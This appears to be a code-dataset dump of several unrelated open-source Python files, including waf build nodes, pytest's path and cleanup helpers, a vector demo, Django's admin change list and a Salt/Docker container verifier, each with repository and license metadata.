os.stat(cur.abspath())
except OSError:
cur.evict()
return None
ret=cur
try:
os.stat(ret.abspath())
except OSError:
ret.evict()
return None
try:
while not getattr(cur.parent,'cache_isdir',None):
cur=cur.parent
cur.cache_isdir=True
except AttributeError:
pass
return ret
def make_node(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
cur=self
for x in lst:
if x=='..':
cur=cur.parent or cur
continue
if getattr(cur,'children',{}):
if x in cur.children:
cur=cur.children[x]
continue
else:
cur.children={}
cur=self.__class__(x,cur)
return cur
def search_node(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
cur=self
for x in lst:
if x=='..':
cur=cur.parent or cur
else:
try:
cur=cur.children[x]
except(AttributeError,KeyError):
return None
return cur
def path_from(self,node):
c1=self
c2=node
c1h=c1.height()
c2h=c2.height()
lst=[]
up=0
while c1h>c2h:
lst.append(c1.name)
c1=c1.parent
c1h-=1
while c2h>c1h:
up+=1
c2=c2.parent
c2h-=1
while id(c1)!=id(c2):
lst.append(c1.name)
up+=1
c1=c1.parent
c2=c2.parent
for i in range(up):
lst.append('..')
lst.reverse()
return os.sep.join(lst)or'.'
def abspath(self):
try:
return self.cache_abspath
except AttributeError:
pass
if os.sep=='/':
if not self.parent:
val=os.sep
elif not self.parent.name:
val=os.sep+self.name
else:
val=self.parent.abspath()+os.sep+self.name
else:
if not self.parent:
val=''
elif not self.parent.name:
val=self.name+os.sep
else:
val=self.parent.abspath().rstrip(os.sep)+os.sep+self.name
self.cache_abspath=val
return val
def is_child_of(self,node):
p=self
diff=self.height()-node.height()
while diff>0:
diff-=1
p=p.parent
return id(p)==id(node)
def ant_iter(self,accept=None,maxdepth=25,pats=[],dir=False,src=True,remove=True):
dircont=self.listdir()
dircont.sort()
try:
lst=set(self.children.keys())
except AttributeError:
self.children={}
else:
if remove:
for x in lst-set(dircont):
self.children[x].evict()
for name in dircont:
npats=accept(name,pats)
if npats and npats[0]:
accepted=[]in npats[0]
node=self.make_node([name])
isdir=os.path.isdir(node.abspath())
if accepted:
if isdir:
if dir:
yield node
else:
if src:
yield node
if getattr(node,'cache_isdir',None)or isdir:
node.cache_isdir=True
if maxdepth:
for k in node.ant_iter(accept=accept,maxdepth=maxdepth-1,pats=npats,dir=dir,src=src,remove=remove):
yield k
raise StopIteration
def ant_glob(self,*k,**kw):
src=kw.get('src',True)
dir=kw.get('dir',False)
excl=kw.get('excl',exclude_regs)
incl=k and k[0]or kw.get('incl','**')
reflags=kw.get('ignorecase',0)and re.I
def to_pat(s):
lst=Utils.to_list(s)
ret=[]
for x in lst:
x=x.replace('\\','/').replace('//','/')
if x.endswith('/'):
x+='**'
lst2=x.split('/')
accu=[]
for k in lst2:
if k=='**':
accu.append(k)
else:
k=k.replace('.','[.]').replace('*','.*').replace('?','.').replace('+','\\+')
k='^%s$'%k
try:
accu.append(re.compile(k,flags=reflags))
except Exception ,e:
raise Errors.WafError("Invalid pattern: %s"%k,e)
ret.append(accu)
return ret
def filtre(name,nn):
ret=[]
for lst in nn:
if not lst:
pass
elif lst[0]=='**':
ret.append(lst)
if len(lst)>1:
if lst[1].match(name):
ret.append(lst[2:])
else:
ret.append([])
elif lst[0].match(name):
ret.append(lst[1:])
return ret
def accept(name,pats):
nacc=filtre(name,pats[0])
nrej=filtre(name,pats[1])
if[]in nrej:
nacc=[]
return[nacc,nrej]
ret=[x for x in self.ant_iter(accept=accept,pats=[to_pat(incl),to_pat(excl)],maxdepth=25,dir=dir,src=src,remove=kw.get('remove',True))]
if kw.get('flat',False):
return' '.join([x.path_from(self)for x in ret])
return ret
def is_src(self):
cur=self
x=id(self.ctx.srcnode)
y=id(self.ctx.bldnode)
while cur.parent:
if id(cur)==y:
return False
if id(cur)==x:
return True
cur=cur.parent
return False
def is_bld(self):
cur=self
y=id(self.ctx.bldnode)
while cur.parent:
if id(cur)==y:
return True
cur=cur.parent
return False
def get_src(self):
cur=self
x=id(self.ctx.srcnode)
y=id(self.ctx.bldnode)
lst=[]
while cur.parent:
if id(cur)==y:
lst.reverse()
return self.ctx.srcnode.make_node(lst)
if id(cur)==x:
return self
lst.append(cur.name)
cur=cur.parent
return self
def get_bld(self):
cur=self
x=id(self.ctx.srcnode)
y=id(self.ctx.bldnode)
lst=[]
while cur.parent:
if id(cur)==y:
return self
if id(cur)==x:
lst.reverse()
return self.ctx.bldnode.make_node(lst)
lst.append(cur.name)
cur=cur.parent
lst.reverse()
if lst and Utils.is_win32 and len(lst[0])==2 and lst[0].endswith(':'):
lst[0]=lst[0][0]
return self.ctx.bldnode.make_node(['__root__']+lst)
def find_resource(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
node=self.get_bld().search_node(lst)
if not node:
self=self.get_src()
node=self.find_node(lst)
if node:
if os.path.isdir(node.abspath()):
return None
return node
def find_or_declare(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
node=self.get_bld().search_node(lst)
if node:
if not os.path.isfile(node.abspath()):
node.sig=None
node.parent.mkdir()
return node
self=self.get_src()
node=self.find_node(lst)
if node:
if not os.path.isfile(node.abspath()):
node.sig=None
node.parent.mkdir()
return node
node=self.get_bld().make_node(lst)
node.parent.mkdir()
return node
def find_dir(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
node=self.find_node(lst)
try:
if not os.path.isdir(node.abspath()):
return None
except(OSError,AttributeError):
return None
return node
def change_ext(self,ext,ext_in=None):
name=self.name
if ext_in is None:
k=name.rfind('.')
if k>=0:
name=name[:k]+ext
else:
name=name+ext
else:
name=name[:-len(ext_in)]+ext
return self.parent.find_or_declare([name])
def nice_path(self,env=None):
return self.path_from(self.ctx.launch_node())
def bldpath(self):
return self.path_from(self.ctx.bldnode)
def srcpath(self):
return self.path_from(self.ctx.srcnode)
def relpath(self):
cur=self
x=id(self.ctx.bldnode)
while cur.parent:
if id(cur)==x:
return self.bldpath()
cur=cur.parent
return self.srcpath()
def bld_dir(self):
return self.parent.bldpath()
def bld_base(self):
s=os.path.splitext(self.name)[0]
return self.bld_dir()+os.sep+s
def get_bld_sig(self):
try:
return self.cache_sig
except AttributeError:
pass
if not self.is_bld()or self.ctx.bldnode is self.ctx.srcnode:
self.sig=Utils.h_file(self.abspath())
self.cache_sig=ret=self.sig
return ret
search=search_node
pickle_lock=Utils.threading.Lock()
class Nod3(Node):
pass
| gpl-2.0 |
cloudera/hue | desktop/core/ext-py/pytest-4.6.11/src/_pytest/pathlib.py | 3 | 11264 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import atexit
import errno
import fnmatch
import itertools
import operator
import os
import shutil
import sys
import uuid
import warnings
from functools import partial
from functools import reduce
from os.path import expanduser
from os.path import expandvars
from os.path import isabs
from os.path import sep
from posixpath import sep as posix_sep
import six
from six.moves import map
from .compat import PY36
from _pytest.warning_types import PytestWarning
if PY36:
from pathlib import Path, PurePath
else:
from pathlib2 import Path, PurePath
__all__ = ["Path", "PurePath"]
LOCK_TIMEOUT = 60 * 60 * 3
get_lock_path = operator.methodcaller("joinpath", ".lock")
def ensure_reset_dir(path):
"""
ensures the given path is an empty directory
"""
if path.exists():
rm_rf(path)
path.mkdir()
def on_rm_rf_error(func, path, exc, **kwargs):
"""Handles known read-only errors during rmtree.
The returned value is used only by our own tests.
"""
start_path = kwargs["start_path"]
exctype, excvalue = exc[:2]
# another process removed the file in the middle of the "rm_rf" (xdist for example)
# more context: https://github.com/pytest-dev/pytest/issues/5974#issuecomment-543799018
if isinstance(excvalue, OSError) and excvalue.errno == errno.ENOENT:
return False
if not isinstance(excvalue, OSError) or excvalue.errno not in (
errno.EACCES,
errno.EPERM,
):
warnings.warn(
PytestWarning(
"(rm_rf) error removing {}\n{}: {}".format(path, exctype, excvalue)
)
)
return False
if func not in (os.rmdir, os.remove, os.unlink):
warnings.warn(
PytestWarning(
"(rm_rf) unknown function {} when removing {}:\n{}: {}".format(
                    func, path, exctype, excvalue
)
)
)
return False
# Chmod + retry.
import stat
def chmod_rw(p):
mode = os.stat(p).st_mode
os.chmod(p, mode | stat.S_IRUSR | stat.S_IWUSR)
# For files, we need to recursively go upwards in the directories to
# ensure they all are also writable.
p = Path(path)
if p.is_file():
for parent in p.parents:
chmod_rw(str(parent))
# stop when we reach the original path passed to rm_rf
if parent == start_path:
break
chmod_rw(str(path))
func(path)
return True
def rm_rf(path):
"""Remove the path contents recursively, even if some elements
are read-only.
"""
onerror = partial(on_rm_rf_error, start_path=path)
shutil.rmtree(str(path), onerror=onerror)
def find_prefixed(root, prefix):
"""finds all elements in root that begin with the prefix, case insensitive"""
l_prefix = prefix.lower()
for x in root.iterdir():
if x.name.lower().startswith(l_prefix):
yield x
def extract_suffixes(iter, prefix):
"""
:param iter: iterator over path names
:param prefix: expected prefix of the path names
:returns: the parts of the paths following the prefix
"""
p_len = len(prefix)
for p in iter:
yield p.name[p_len:]
def find_suffixes(root, prefix):
"""combines find_prefixes and extract_suffixes
"""
return extract_suffixes(find_prefixed(root, prefix), prefix)
def parse_num(maybe_num):
"""parses number path suffixes, returns -1 on error"""
try:
return int(maybe_num)
except ValueError:
return -1
if six.PY2:
def _max(iterable, default):
"""needed due to python2.7 lacking the default argument for max"""
return reduce(max, iterable, default)
else:
_max = max
def _force_symlink(root, target, link_to):
"""helper to create the current symlink
it's full of race conditions that are reasonably ok to ignore
    for the context of best effort linking to the latest test run,
    the presumption being that in case of much parallelism
the inaccuracy is going to be acceptable
"""
current_symlink = root.joinpath(target)
try:
current_symlink.unlink()
except OSError:
pass
try:
current_symlink.symlink_to(link_to)
except Exception:
pass
def make_numbered_dir(root, prefix):
"""create a directory with an increased number as suffix for the given prefix"""
for i in range(10):
# try up to 10 times to create the folder
max_existing = _max(map(parse_num, find_suffixes(root, prefix)), default=-1)
new_number = max_existing + 1
new_path = root.joinpath("{}{}".format(prefix, new_number))
try:
new_path.mkdir()
except Exception:
pass
else:
_force_symlink(root, prefix + "current", new_path)
return new_path
else:
raise EnvironmentError(
"could not create numbered dir with prefix "
"{prefix} in {root} after 10 tries".format(prefix=prefix, root=root)
)
def create_cleanup_lock(p):
"""crates a lock to prevent premature folder cleanup"""
lock_path = get_lock_path(p)
try:
fd = os.open(str(lock_path), os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
except OSError as e:
if e.errno == errno.EEXIST:
six.raise_from(
EnvironmentError("cannot create lockfile in {path}".format(path=p)), e
)
else:
raise
else:
pid = os.getpid()
spid = str(pid)
if not isinstance(spid, bytes):
spid = spid.encode("ascii")
os.write(fd, spid)
os.close(fd)
if not lock_path.is_file():
raise EnvironmentError("lock path got renamed after successful creation")
return lock_path
def register_cleanup_lock_removal(lock_path, register=atexit.register):
"""registers a cleanup function for removing a lock, by default on atexit"""
pid = os.getpid()
def cleanup_on_exit(lock_path=lock_path, original_pid=pid):
current_pid = os.getpid()
if current_pid != original_pid:
# fork
return
try:
lock_path.unlink()
except (OSError, IOError):
pass
return register(cleanup_on_exit)
def maybe_delete_a_numbered_dir(path):
"""removes a numbered directory if its lock can be obtained and it does not seem to be in use"""
lock_path = None
try:
lock_path = create_cleanup_lock(path)
parent = path.parent
garbage = parent.joinpath("garbage-{}".format(uuid.uuid4()))
path.rename(garbage)
rm_rf(garbage)
except (OSError, EnvironmentError):
# known races:
# * other process did a cleanup at the same time
# * deletable folder was found
# * process cwd (Windows)
return
finally:
# if we created the lock, ensure we remove it even if we failed
# to properly remove the numbered dir
if lock_path is not None:
try:
lock_path.unlink()
except (OSError, IOError):
pass
def ensure_deletable(path, consider_lock_dead_if_created_before):
"""checks if a lock exists and breaks it if its considered dead"""
if path.is_symlink():
return False
lock = get_lock_path(path)
if not lock.exists():
return True
try:
lock_time = lock.stat().st_mtime
except Exception:
return False
else:
if lock_time < consider_lock_dead_if_created_before:
lock.unlink()
return True
else:
return False
def try_cleanup(path, consider_lock_dead_if_created_before):
"""tries to cleanup a folder if we can ensure it's deletable"""
if ensure_deletable(path, consider_lock_dead_if_created_before):
maybe_delete_a_numbered_dir(path)
def cleanup_candidates(root, prefix, keep):
"""lists candidates for numbered directories to be removed - follows py.path"""
max_existing = _max(map(parse_num, find_suffixes(root, prefix)), default=-1)
max_delete = max_existing - keep
paths = find_prefixed(root, prefix)
paths, paths2 = itertools.tee(paths)
numbers = map(parse_num, extract_suffixes(paths2, prefix))
for path, number in zip(paths, numbers):
if number <= max_delete:
yield path
def cleanup_numbered_dir(root, prefix, keep, consider_lock_dead_if_created_before):
"""cleanup for lock driven numbered directories"""
for path in cleanup_candidates(root, prefix, keep):
try_cleanup(path, consider_lock_dead_if_created_before)
for path in root.glob("garbage-*"):
try_cleanup(path, consider_lock_dead_if_created_before)
def make_numbered_dir_with_cleanup(root, prefix, keep, lock_timeout):
"""creates a numbered dir with a cleanup lock and removes old ones"""
e = None
for i in range(10):
try:
p = make_numbered_dir(root, prefix)
lock_path = create_cleanup_lock(p)
register_cleanup_lock_removal(lock_path)
except Exception as exc:
e = exc
else:
consider_lock_dead_if_created_before = p.stat().st_mtime - lock_timeout
cleanup_numbered_dir(
root=root,
prefix=prefix,
keep=keep,
consider_lock_dead_if_created_before=consider_lock_dead_if_created_before,
)
return p
assert e is not None
raise e
def resolve_from_str(input, root):
assert not isinstance(input, Path), "would break on py2"
root = Path(root)
input = expanduser(input)
input = expandvars(input)
if isabs(input):
return Path(input)
else:
return root.joinpath(input)
def fnmatch_ex(pattern, path):
"""FNMatcher port from py.path.common which works with PurePath() instances.
The difference between this algorithm and PurePath.match() is that the latter matches "**" glob expressions
for each part of the path, while this algorithm uses the whole path instead.
For example:
"tests/foo/bar/doc/test_foo.py" matches pattern "tests/**/doc/test*.py" with this algorithm, but not with
PurePath.match().
This algorithm was ported to keep backward-compatibility with existing settings which assume paths match according
this logic.
References:
* https://bugs.python.org/issue29249
* https://bugs.python.org/issue34731
"""
path = PurePath(path)
iswin32 = sys.platform.startswith("win")
if iswin32 and sep not in pattern and posix_sep in pattern:
# Running on Windows, the pattern has no Windows path separators,
# and the pattern has one or more Posix path separators. Replace
# the Posix path separators with the Windows path separator.
pattern = pattern.replace(posix_sep, sep)
if sep not in pattern:
name = path.name
else:
name = six.text_type(path)
return fnmatch.fnmatch(name, pattern)
def parts(s):
parts = s.split(sep)
return {sep.join(parts[: i + 1]) or sep for i in range(len(parts))}
| apache-2.0 |
sysalexis/kbengine | kbe/src/lib/python/Tools/demo/vector.py | 110 | 1452 | #!/usr/bin/env python3
"""
A demonstration of classes and their special methods in Python.
"""
class Vec:
"""A simple vector class.
Instances of the Vec class can be constructed from numbers
>>> a = Vec(1, 2, 3)
>>> b = Vec(3, 2, 1)
added
>>> a + b
Vec(4, 4, 4)
subtracted
>>> a - b
Vec(-2, 0, 2)
and multiplied by a scalar on the left
>>> 3.0 * a
Vec(3.0, 6.0, 9.0)
or on the right
>>> a * 3.0
Vec(3.0, 6.0, 9.0)
"""
def __init__(self, *v):
self.v = list(v)
@classmethod
def fromlist(cls, v):
if not isinstance(v, list):
raise TypeError
inst = cls()
inst.v = v
return inst
def __repr__(self):
args = ', '.join(repr(x) for x in self.v)
return 'Vec({})'.format(args)
def __len__(self):
return len(self.v)
def __getitem__(self, i):
return self.v[i]
def __add__(self, other):
# Element-wise addition
v = [x + y for x, y in zip(self.v, other.v)]
return Vec.fromlist(v)
def __sub__(self, other):
# Element-wise subtraction
v = [x - y for x, y in zip(self.v, other.v)]
return Vec.fromlist(v)
def __mul__(self, scalar):
# Multiply by scalar
v = [x * scalar for x in self.v]
return Vec.fromlist(v)
__rmul__ = __mul__
def test():
import doctest
doctest.testmod()
test()
| lgpl-3.0 |
ashishnitinpatil/vnitstudnotifs | django/contrib/admin/views/main.py | 49 | 17582 | import sys
import warnings
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.core.paginator import InvalidPage
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.fields import FieldDoesNotExist
from django.utils import six
from django.utils.datastructures import SortedDict
from django.utils.deprecation import RenameMethodsBase
from django.utils.encoding import force_str, force_text
from django.utils.translation import ugettext, ugettext_lazy
from django.utils.http import urlencode
from django.contrib.admin import FieldListFilter
from django.contrib.admin.exceptions import DisallowedModelAdminLookup
from django.contrib.admin.options import IncorrectLookupParameters, IS_POPUP_VAR
from django.contrib.admin.util import (quote, get_fields_from_path,
lookup_needs_distinct, prepare_lookup_value)
# Changelist settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
TO_FIELD_VAR = 't'
ERROR_FLAG = 'e'
IGNORED_PARAMS = (
ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR, TO_FIELD_VAR)
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = ugettext_lazy('(None)')
def _is_changelist_popup(request):
"""
Returns True if the popup GET parameter is set.
This function is introduced to facilitate deprecating the legacy
value for IS_POPUP_VAR and should be removed at the end of the
deprecation cycle.
"""
if IS_POPUP_VAR in request.GET:
return True
IS_LEGACY_POPUP_VAR = 'pop'
if IS_LEGACY_POPUP_VAR in request.GET:
warnings.warn(
"The `%s` GET parameter has been renamed to `%s`." %
(IS_LEGACY_POPUP_VAR, IS_POPUP_VAR),
PendingDeprecationWarning, 2)
return True
return False
class RenameChangeListMethods(RenameMethodsBase):
renamed_methods = (
('get_query_set', 'get_queryset', PendingDeprecationWarning),
)
class ChangeList(six.with_metaclass(RenameChangeListMethods)):
def __init__(self, request, model, list_display, list_display_links,
list_filter, date_hierarchy, search_fields, list_select_related,
list_per_page, list_max_show_all, list_editable, model_admin):
self.model = model
self.opts = model._meta
self.lookup_opts = self.opts
self.root_queryset = model_admin.get_queryset(request)
self.list_display = list_display
self.list_display_links = list_display_links
self.list_filter = list_filter
self.date_hierarchy = date_hierarchy
self.search_fields = search_fields
self.list_select_related = list_select_related
self.list_per_page = list_per_page
self.list_max_show_all = list_max_show_all
self.model_admin = model_admin
self.preserved_filters = model_admin.get_preserved_filters(request)
# Get search parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
self.show_all = ALL_VAR in request.GET
self.is_popup = _is_changelist_popup(request)
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
if self.is_popup:
self.list_editable = ()
else:
self.list_editable = list_editable
self.query = request.GET.get(SEARCH_VAR, '')
self.queryset = self.get_queryset(request)
self.get_results(request)
if self.is_popup:
title = ugettext('Select %s')
else:
title = ugettext('Select %s to change')
self.title = title % force_text(self.opts.verbose_name)
self.pk_attname = self.lookup_opts.pk.attname
@property
def root_query_set(self):
warnings.warn("`ChangeList.root_query_set` is deprecated, "
"use `root_queryset` instead.",
PendingDeprecationWarning, 2)
return self.root_queryset
@property
def query_set(self):
warnings.warn("`ChangeList.query_set` is deprecated, "
"use `queryset` instead.",
PendingDeprecationWarning, 2)
return self.queryset
def get_filters_params(self, params=None):
"""
Returns all params except IGNORED_PARAMS
"""
if not params:
params = self.params
lookup_params = params.copy() # a dictionary of the query string
# Remove all the parameters that are globally and systematically
# ignored.
for ignored in IGNORED_PARAMS:
if ignored in lookup_params:
del lookup_params[ignored]
return lookup_params
def get_filters(self, request):
lookup_params = self.get_filters_params()
use_distinct = False
# Normalize the types of keys
for key, value in lookup_params.items():
if not isinstance(key, str):
# 'key' will be used as a keyword argument later, so Python
# requires it to be a string.
del lookup_params[key]
lookup_params[force_str(key)] = value
if not self.model_admin.lookup_allowed(key, value):
raise DisallowedModelAdminLookup("Filtering by %s not allowed" % key)
filter_specs = []
if self.list_filter:
for list_filter in self.list_filter:
if callable(list_filter):
# This is simply a custom list filter class.
spec = list_filter(request, lookup_params,
self.model, self.model_admin)
else:
field_path = None
if isinstance(list_filter, (tuple, list)):
# This is a custom FieldListFilter class for a given field.
field, field_list_filter_class = list_filter
else:
# This is simply a field name, so use the default
# FieldListFilter class that has been registered for
# the type of the given field.
field, field_list_filter_class = list_filter, FieldListFilter.create
if not isinstance(field, models.Field):
field_path = field
field = get_fields_from_path(self.model, field_path)[-1]
spec = field_list_filter_class(field, request, lookup_params,
self.model, self.model_admin, field_path=field_path)
# Check if we need to use distinct()
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts,
field_path))
if spec and spec.has_output():
filter_specs.append(spec)
# At this point, all the parameters used by the various ListFilters
# have been removed from lookup_params, which now only contains other
# parameters passed via the query string. We now loop through the
# remaining parameters both to ensure that all the parameters are valid
# fields and to determine if at least one of them needs distinct(). If
# the lookup parameters aren't real fields, then bail out.
try:
for key, value in lookup_params.items():
lookup_params[key] = prepare_lookup_value(key, value)
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts, key))
return filter_specs, bool(filter_specs), lookup_params, use_distinct
except FieldDoesNotExist as e:
six.reraise(IncorrectLookupParameters, IncorrectLookupParameters(e), sys.exc_info()[2])
def get_query_string(self, new_params=None, remove=None):
if new_params is None: new_params = {}
if remove is None: remove = []
p = self.params.copy()
for r in remove:
for k in list(p):
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(sorted(p.items()))
def get_results(self, request):
paginator = self.model_admin.get_paginator(request, self.queryset, self.list_per_page)
# Get the number of objects, with admin filters applied.
result_count = paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization:
# full_result_count is equal to paginator.count if no filters
# were applied
if self.get_filters_params() or self.params.get(SEARCH_VAR):
full_result_count = self.root_queryset.count()
else:
full_result_count = result_count
can_show_all = result_count <= self.list_max_show_all
multi_page = result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and can_show_all) or not multi_page:
result_list = self.queryset._clone()
else:
try:
result_list = paginator.page(self.page_num+1).object_list
except InvalidPage:
raise IncorrectLookupParameters
self.result_count = result_count
self.full_result_count = full_result_count
self.result_list = result_list
self.can_show_all = can_show_all
self.multi_page = multi_page
self.paginator = paginator
def _get_default_ordering(self):
ordering = []
if self.model_admin.ordering:
ordering = self.model_admin.ordering
elif self.lookup_opts.ordering:
ordering = self.lookup_opts.ordering
return ordering
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'admin_order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.lookup_opts.get_field(field_name)
return field.name
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self.model_admin, field_name):
attr = getattr(self.model_admin, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'admin_order_field', None)
def get_ordering(self, request, queryset):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
params = self.params
ordering = list(self.model_admin.get_ordering(request)
or self._get_default_ordering())
if ORDER_VAR in params:
# Clear ordering and used params
ordering = []
order_params = params[ORDER_VAR].split('.')
for p in order_params:
try:
none, pfx, idx = p.rpartition('-')
field_name = self.list_display[int(idx)]
order_field = self.get_ordering_field(field_name)
if not order_field:
continue # No 'admin_order_field', skip it
ordering.append(pfx + order_field)
except (IndexError, ValueError):
continue # Invalid ordering specified, skip it.
# Add the given query's ordering fields, if any.
ordering.extend(queryset.query.order_by)
# Ensure that the primary key is systematically present in the list of
# ordering fields so we can guarantee a deterministic order across all
# database backends.
pk_name = self.lookup_opts.pk.name
if not (set(ordering) & set(['pk', '-pk', pk_name, '-' + pk_name])):
# The two sets do not intersect, meaning the pk isn't present. So
# we add it.
ordering.append('-pk')
return ordering
def get_ordering_field_columns(self):
"""
Returns a SortedDict of ordering field column numbers and asc/desc
"""
# We must cope with more than one column having the same underlying sort
# field, so we base things on column numbers.
ordering = self._get_default_ordering()
ordering_fields = SortedDict()
if ORDER_VAR not in self.params:
# for ordering specified on ModelAdmin or model Meta, we don't know
# the right column numbers absolutely, because there might be more
# than one column associated with that ordering, so we guess.
for field in ordering:
if field.startswith('-'):
field = field[1:]
order_type = 'desc'
else:
order_type = 'asc'
for index, attr in enumerate(self.list_display):
if self.get_ordering_field(attr) == field:
ordering_fields[index] = order_type
break
else:
for p in self.params[ORDER_VAR].split('.'):
none, pfx, idx = p.rpartition('-')
try:
idx = int(idx)
except ValueError:
continue # skip it
ordering_fields[idx] = 'desc' if pfx == '-' else 'asc'
return ordering_fields
def get_queryset(self, request):
# First, we collect all the declared list filters.
(self.filter_specs, self.has_filters, remaining_lookup_params,
filters_use_distinct) = self.get_filters(request)
# Then, we let every list filter modify the queryset to its liking.
qs = self.root_queryset
for filter_spec in self.filter_specs:
new_qs = filter_spec.queryset(request, qs)
if new_qs is not None:
qs = new_qs
try:
# Finally, we apply the remaining lookup parameters from the query
# string (i.e. those that haven't already been processed by the
# filters).
qs = qs.filter(**remaining_lookup_params)
except (SuspiciousOperation, ImproperlyConfigured):
# Allow certain types of errors to be re-raised as-is so that the
# caller can treat them in a special way.
raise
except Exception as e:
# Every other error is caught with a naked except, because we don't
# have any other way of validating lookup parameters. They might be
# invalid if the keyword arguments are incorrect, or if the values
# are not of the correct type, so we might get FieldError,
# ValueError, ValidationError, or some other exception.
raise IncorrectLookupParameters(e)
if not qs.query.select_related:
qs = self.apply_select_related(qs)
# Set ordering.
ordering = self.get_ordering(request, qs)
qs = qs.order_by(*ordering)
# Apply search results
qs, search_use_distinct = self.model_admin.get_search_results(
request, qs, self.query)
# Remove duplicates from results, if necessary
if filters_use_distinct | search_use_distinct:
return qs.distinct()
else:
return qs
def apply_select_related(self, qs):
if self.list_select_related is True:
return qs.select_related()
if self.list_select_related is False:
if self.has_related_field_in_list_display():
return qs.select_related()
if self.list_select_related:
return qs.select_related(*self.list_select_related)
return qs
def has_related_field_in_list_display(self):
for field_name in self.list_display:
try:
field = self.lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(field.rel, models.ManyToOneRel):
return True
return False
def url_for_result(self, result):
pk = getattr(result, self.pk_attname)
return reverse('admin:%s_%s_change' % (self.opts.app_label,
self.opts.model_name),
args=(quote(pk),),
current_app=self.model_admin.admin_site.name)
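# A minimal standalone sketch (not part of Django) of the query string
# pattern used by ChangeList.get_query_string above: copy the current
# params, drop removed prefixes, merge overrides, and urlencode the rest.
# The urlencode import is an assumption about the surrounding module.
def _query_string_sketch(params, new_params=None, remove=None):
    from django.utils.http import urlencode  # assumed to be available here
    params = dict(params)
    for prefix in (remove or []):
        for key in list(params):
            if key.startswith(prefix):
                del params[key]
    for key, value in (new_params or {}).items():
        if value is None:
            params.pop(key, None)
        else:
            params[key] = value
    return '?%s' % urlencode(sorted(params.items()))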
| bsd-3-clause |
cholcombe973/autodock | verify.py | 5 | 7544 | '''
This class performs a few functions:
1. If the host is up and the container is down it starts the container
2. Verifies a container is running
3. Verifies a container has cron running. Calls start.sh if needed.
'''
import paramiko
import salt.client
import time
from circularlist import CircularList
from etcd import Etcd
from paramiko import SSHException
from pyparsing import Literal, srange, Word
class VerifyFormations(object):
def __init__(self, manager, logger):
self.logger = logger
self.salt_client = salt.client.LocalClient()
self.manager = manager
self.etcd = Etcd(logger)
def start_verifying(self):
# Parse out the username and formation name
# from the ETCD directory string
formation_parser = Literal('/formations/') + \
Word(srange("[0-9a-zA-Z_-]")).setResultsName('username') + Literal('/') + \
Word(srange("[0-9a-zA-Z_-]")).setResultsName('formation_name')
# call out to ETCD and load all the formations
formation_list = []
user_list = self.etcd.list_directory('formations')
if user_list:
for user in user_list:
formations = self.etcd.list_directory(user)
for formation in formations:
parse_results = formation_parser.parseString(formation)
if parse_results:
formation_name = parse_results['formation_name']
username = parse_results['username']
self.logger.info('Attempting to load formation: {formation_name} '
'with username: {username}'.format(formation_name=formation_name,
username=username))
f = self.manager.load_formation_from_etcd(username, formation_name)
formation_list.append(f)
else:
self.logger.error("Could not parse the ETCD string")
if formation_list:
# TODO Use background salt jobs
# Start verifying things
# Ask salt to do these things for me and give me back an job_id
# results = self.salt_client.cmd_async(host, 'cmd.run',
# ['netstat -an | grep %s | grep tcp | grep -i listen' % port],
# expr_form='list')
#
# salt-run jobs.lookup_jid <job id number>
for f in formation_list:
for app in f.application_list:
# Check to make sure it's up and running
self.logger.info("Running verification on app: "
"{app_name}".format(app_name=app.hostname))
self.logger.info('{server} docker ps | grep {container_id}'.format(
server=app.host_server,
container_id=app.container_id))
results = self.salt_client.cmd(app.host_server, 'cmd.run',
['docker ps | grep {container_id}'.format(container_id=app.container_id)],
expr_form='list')
if results:
self.logger.debug("Salt return: {docker_results}".format(
docker_results=results[app.host_server]))
if results[app.host_server] == "":
self.logger.error("App {app} is not running!".format(
app=app.hostname))
# Start the app back up and run start.sh there
self.start_application(app)
else:
self.logger.info("App {app} is running. Checking if "
"cron is running also".format(app=app.hostname))
# Check if cron is running on the container and bring it back
# up if needed
# Log in with ssh and check if cron is up and running
self.logger.info("Sleeping 2 seconds while the container starts")
time.sleep(2)
self.check_running_application(app)
else:
self.logger.error("Call out to server {server} failed. Moving it".format(
server=app.host_server))
# move the container
self.move_application(app)
# Start an application that isn't running
def start_application(self, app):
# Start the application and run start.sh to kick off cron
self.logger.info("Starting app {app} with docker id: {app_id} up".format(
app=app.hostname, app_id=app.container_id))
